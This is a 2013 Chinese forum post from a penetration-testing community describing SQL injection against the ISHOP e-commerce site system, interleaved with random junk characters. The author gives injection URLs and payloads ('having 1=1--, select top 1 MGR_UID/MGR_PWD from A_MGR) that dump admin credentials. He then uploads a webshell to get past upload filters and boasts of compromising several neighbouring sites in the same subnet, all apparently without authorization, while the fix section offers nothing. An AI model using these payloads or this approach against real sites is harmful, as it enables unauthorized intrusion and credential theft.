中国网络渗透测试联盟
标题:
ISHOP商场建站系统注入漏洞
[打印本页]
作者:
admin
时间:
2013-4-4 17:40
标题:
ISHOP商场建站系统注入漏洞
发现一个注入点
7 \3 q5 z4 b3 E J
http://www.xxx.com
/Diary_A.asp?UBID=&DCID=DC2012050610553697&DIID=DI2012050610583389
9 e/ V+ K6 q5 H2 {. O6 i
$ R. D# D8 L; x2 X" P! v
习惯性的加’having1=1--
! `9 ?6 T' s" Y' @) @: u. @
& k7 H" C% T! G4 h. h
http://www.xxx.com.tw/Diary_A.asp?UBID=&DCID=DC2012050610553697&DIID=DI2012050610583389
’having 1=1—
% b0 L$ k$ f0 D/ Z
/ _5 F4 K& j: k2 ?
0
- g3 j0 G# a. n9 Q3 Y
" G# [0 d$ ]2 D7 f A3 p2 y
爆出Diary_A.dl_Title(这时候很激动啊)
' I$ |0 }: L4 [! B! s
: |& q2 f/ z+ Z) `) l$ ~* k
那么继续
0 v5 l# }* r. c' g* m2 B* }) x% P
http://www.xxx.com.tw/Diary_A.asp?UBID=&DCID=DC2012050610553697&DIID=DI2012050610583389
’group by dl_Title having 1=1—
( Q6 N5 P% }& F' f. Q( s5 `
+ W) r; R. D! {8 r! y3 }
继续,一直爆下去
( y& ?* N" g0 i) N
& x: ^1 w6 O+ _5 I7 L
爆到几个字段和表段 但是没找到需要的管理用户的字段
0 W( G X' E; w2 T1 }
& j5 [/ R Y# T6 d
蛋疼了 怎么办 然后去后台登陆页看源码
" y- r6 G) E1 ], Y! Y
9 V1 l2 c* r; k# T1 K, C8 X
0
- }3 ^ \# C$ M, o' I2 [9 A
! q0 }- P3 D! M4 V3 ]
Input name= “ADUID”
: P6 a# P# G. b% |6 U' H) B
Input name= “ADPWD”
) h/ J& v/ z0 j; s8 p
# M7 I: I/ M; m# K
很幸运 找到了字段那就继续
* c, v3 a T% a/ U
找到之后开始爆用户
1 i; @4 {& G! f9 r% j( a( _# r! d2 B
http://www.xxx.com.tw/Diary_A.asp?UBID=&DCID=DC2012050610553697&DIID=DI2012050610583389'and
(select top 1 MGR_UID from A_MGR)>0—
( l R: ?- R, m4 y' Y! b
爆密码
4 F9 A( i; b5 ?1 D' \* M
http://www.xxx.com.tw/Diary_A.asp?UBID=&DCID=DC2012050610553697&DIID=DI2012050610583389'and
(select top 1 MGR_PWD from A_MGR)>0—
5 t6 s8 ]7 i I) o
测试了下 这个注入点只能爆到文章哪里的表
% M1 \4 D1 A U' o
& w. g# L* h& l! m3 P& f
头疼 继续 既然只能报道文章哪里的表去后台爆 不过后台字符限制了
0 w M, H' B; r" y
: ]( | C7 Y" T6 C
又想到 用户登录哪里也可以的吧就去试试 果然 今天我很幸运吧 爆出来了
9 t5 |- }" v L( G7 [. f0 c5 ~
5 C# U0 l k6 f& l, M
473
( k( B. A; L% O$ R% q v2 N
4 K# D& r3 E# s: H& h% ]- W
进后台
6 [+ d9 q( @! C1 M `) V6 d6 E
- w4 ]) f6 @8 G. h# I
x0 A7 `5 j6 f( b1 D% m
发现几个上传点 有的地方不能上传 而且防止恶意代码
a% ^, U! |( H6 \
5 E8 F% H, Y) C
没办法 各种百度各种找大牛 找到一只好像可以突破的马
$ m! [: U+ M$ \1 ^
4 ]1 T. s }: p1 |7 P7 ~5 p
: c' S3 _ @1 t3 T# z
在系统管理那里直接上传 不过没有显示地址
5 E- ^5 b7 b: v2 C0 V0 k; `
/ T% k8 T% w! g5 R
再上传一次 抓包 搞定OK
9 Y& ~8 X) o( T+ D& G
) W* g/ O5 v5 q
" n3 ~; X& G) M; {% L9 y5 c
+ h4 L( }! t! Z( Y5 W# [
472
: V# i7 x/ n* i: A2 U. I
9 c& e8 @- N* ~# q" h
晚上不行了 去睡觉。。。
+ |4 `- ?/ G4 _( i6 j3 [
第二天刚起床 闲的没事做继续日站吧
0 v7 O# @' q7 s( k. H# P
; z1 @1 `* j. s6 m ~8 J
找个站 就把这个站的旁c扫了下
1 ~8 _: e7 R2 X& w+ A: |! d; O# ?
. n4 ~2 {, J. r& e# v
发现c段也有一个购物站 ,然后还和这个站的模板差不多
8 K5 p! X- L1 D
, a3 Z! R- X1 Z
就找到会员登录口测试
0 T0 E' t% v/ M* E! h3 J0 R
6 S1 I5 g; k" N$ j9 _4 O, x
'and (select top 1 MGR_UID from A_MGR)>0—
. W9 i; T* a$ @, ~! I* N
果断爆到了 这时候我很激动 通杀
, \4 q ^* K( H* [" g0 A h1 \
8 [) c" q1 k. Y# Q7 a; |- U
再次翻c段
3 R0 E2 q$ ]4 x; g/ C
& n9 J. Q# u; R0 {: A2 z; E
翻出几个站 都成功拿下
7 s/ l7 _) o$ R5 f) Q5 F* O* s& P
% Z2 U# W) x' M1 l# r
- R# Z* g. u4 Y- _7 q
2 w* Q4 p! ]1 L
修复方案:
N/ M+ S4 ^/ Y4 X% l$ _" p* M
他们比我专业
. |+ ]" y2 J6 b1 U9 |4 @% J
8 Q `1 u7 r1 u1 Q; M$ i3 G. }
( ]4 S9 z" r5 n3 D1 m
" F8 R/ `0 g$ }9 f1 w/ c8 e+ ^& G# n
欢迎光临 中国网络渗透测试联盟 (https://www.cobjon.com/)
Powered by Discuz! X3.2